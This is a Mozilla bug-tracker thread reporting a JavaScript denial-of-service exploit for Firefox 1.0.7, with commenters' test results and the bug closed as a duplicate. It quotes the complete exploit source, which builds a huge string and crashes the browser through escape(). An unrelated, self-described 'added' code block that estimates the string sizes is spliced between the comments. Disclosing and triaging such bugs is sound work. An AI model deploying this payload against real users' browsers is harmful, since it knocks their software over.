Closed
Bug 312102
Opened 19 years ago
Closed 19 years ago
Working Denial of service exploit crashes Firefox 1.07
Categories
(Core :: JavaScript Engine, defect)
RESOLVED
DUPLICATE
of bug 303213
People
(Reporter: jp.senior, Unassigned)
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
See the following:
http://www.triviasecurity.net/exploits/Mozilla_Firefox_%3C=_1.0.7_Integar_Overflow_Denial_of_Service_Exploit
Contains the source:
<html>
Copyright Georgi Guninski
<br>
Cannot be used in vulnerability databases
<br>
Especially securityfocus/mitre/cve/cert
<script>
var s=String.fromCharCode(257);
var ki="";
var me="";
for(i=0;i<1024;i++)
{ki=ki+s;}
for(i=0;i<1024;i++)
{me=me+ki;}
var ov=s;
for(i=0;i<28;i++) ov += ov;
for(i=0;i<88;i++) ov += me;
alert("done generating");
var fuckbill=escape(ov);
alert("done escape");
alert(fuckbill);
</script>
</html>
Reproducible: Always
Steps to Reproduce:
Actual Results:
Firefox immediately locked up
I had other people test this on various OS's. This is confirmed to work.
Comment 2•19 years ago
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20051010
Firefox/1.6a1
I don't see a crash or hang, but Firefox says "Out of memory" in the JavaScript
console during the escape() step. I never see the "done escape" message. I
think "Out of memory" is bogus in this case, btw.
Comment 3•19 years ago
Same with Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12)
Gecko/20050914 Firefox/1.0.7.
Comment 4•19 years ago
With Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051007
Firefox/1.6a1, I get "out of memory" before it even gets to the "done
generating" message.
Comment 5•19 years ago
> I think "Out of memory" is bogus in this case, btw.
Never mind. After re-reading the script I see that it is generating a
ridiculously long string.
Assignee: nobody → general
Component: Security → JavaScript Engine
Product: Firefox → Core
QA Contact: firefox → general
Version: unspecified → 1.7 Branch
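As an added worked check (not part of the bug report or the quoted script): modelling the string growth of the script above without allocating anything shows why "Out of memory" is the honest outcome, and why the escaped result is large enough to matter for a 32-bit length field. It assumes only that escape() expands each U+0101 code unit to "%u0101" (6 code units), which is standard behaviour.

```javascript
// Added analysis, not code from the bug report: reproduce the arithmetic of the
// quoted script using lengths only, so nothing large is ever allocated.
function estimateExploitFootprint() {
  const unit = String.fromCharCode(257);   // the single character the script repeats
  const escapedUnit = escape(unit);        // "%u0101": 6 code units per input char
  const ki = 1024;                         // ki = 1024 copies of s
  const me = 1024 * ki;                    // me = 1024 copies of ki (1 Mi chars)
  let ov = 1;                              // ov starts as s
  for (let i = 0; i < 28; i++) ov += ov;   // 28 doublings: 2^28 chars
  for (let i = 0; i < 88; i++) ov += me;   // plus 88 MiB-sized chunks
  const escapedChars = ov * escapedUnit.length;
  return {
    unitEscaped: escapedUnit,
    ovChars: ov,                           // 360,710,144 code units
    ovBytesUtf16: ov * 2,                  // ~721 MB before escape() runs
    escapedChars,                          // 2,164,260,864 code units
    escapedBytesUtf16: escapedChars * 2,   // ~4.3 GB of output
    // The escaped length is larger than 2^31-1, so any signed 32-bit
    // length computation for it wraps; that is the "integer overflow" the
    // linked exploit title refers to.
    exceeds32BitSigned: escapedChars > 0x7fffffff,
  };
}
```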
Comment 6•19 years ago
(In reply to comment #1)
> I had other people test this on various OS's. This is confirmed to work.
Define "work" -- we think we fixed this in 1.0.7
see bug 303213 and bug 305190
*** This bug has been marked as a duplicate of 303213 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE